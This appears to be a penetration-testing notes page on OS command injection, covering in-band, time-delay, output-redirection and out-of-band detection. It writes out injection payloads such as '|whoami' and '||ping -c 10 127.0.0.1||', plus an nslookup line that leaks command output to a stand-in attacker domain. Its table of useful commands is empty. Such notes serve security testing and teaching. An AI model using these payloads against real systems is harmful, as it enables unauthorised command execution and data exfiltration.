OS command injection
Useful commands
Purpose of command | Linux | Windows |
Name of current user |
|
|
Operating system |
|
|
Network configuration |
|
|
Network connections |
|
|
Running processes |
|
|
How to Test this Vulnerability
Simple case
try to add
|whoami
to the end of parameters go to DB and observe the responsethis case work when website append no defense against this type of attacks
Blind OS command injection vulnerabilities
he application does not return the output from the command within its HTTP response.
Consider a web site that lets users submit feedback about the site.
How to detect :
Detecting blind OS command injection using time delays
add
||ping -c 10 127.0.0.1||
if delay executed this parameter vulnerableExploiting blind OS command injection by redirecting output
add
||whoami > /var/www/static/whoami.txt||
then search for function which retrieve data from this folder alter the request towhoami.txt
Exploiting blind OS command injection using out-of-band (OAST) techniques
add
|| nslookup yoursite.com ||
then check your logs or use burp collab URLadd ||nslookup+whoami.yoursite.com|| then check your logs or use burp collab URL
Ways of injecting OS commands
A variety of shell metacharacters can be used to perform OS command injection attacks.
A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:
&
&&
|
||
The following command separators work only on Unix-based systems:
;
Newline (0x0a or \n)
On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
Note :
that the different shell metacharacters have subtly different behaviors that might affect whether they work in certain situations, and whether they allow in-band retrieval of command output or are useful only for blind exploitation.
Sometimes, the input that you control appears within quotation marks in the original command. In this situation, you need to terminate the quoted context (using " or ') before using suitable shell metacharacters to inject a new command.
Last updated